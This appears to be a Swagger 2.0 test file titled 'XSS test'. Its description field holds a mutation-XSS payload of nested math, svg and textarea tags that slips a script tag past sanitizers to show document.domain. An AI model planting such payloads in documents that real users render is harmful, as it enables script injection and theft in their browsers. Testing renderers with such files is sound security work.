swagger: '2.0'
info:
  title: XSS test
  description: <math><mtext><h1><a><h6></a></h6>&lt;mglyph&gt;<svg><mtext><textarea><path id="</textarea><script> alert(document.domain)</script>"></form></h1>">"</textarea></desc></textarea></mtext></mtext></svg>&lt;/mglyph&gt;</option></mtext></math>
  version: production
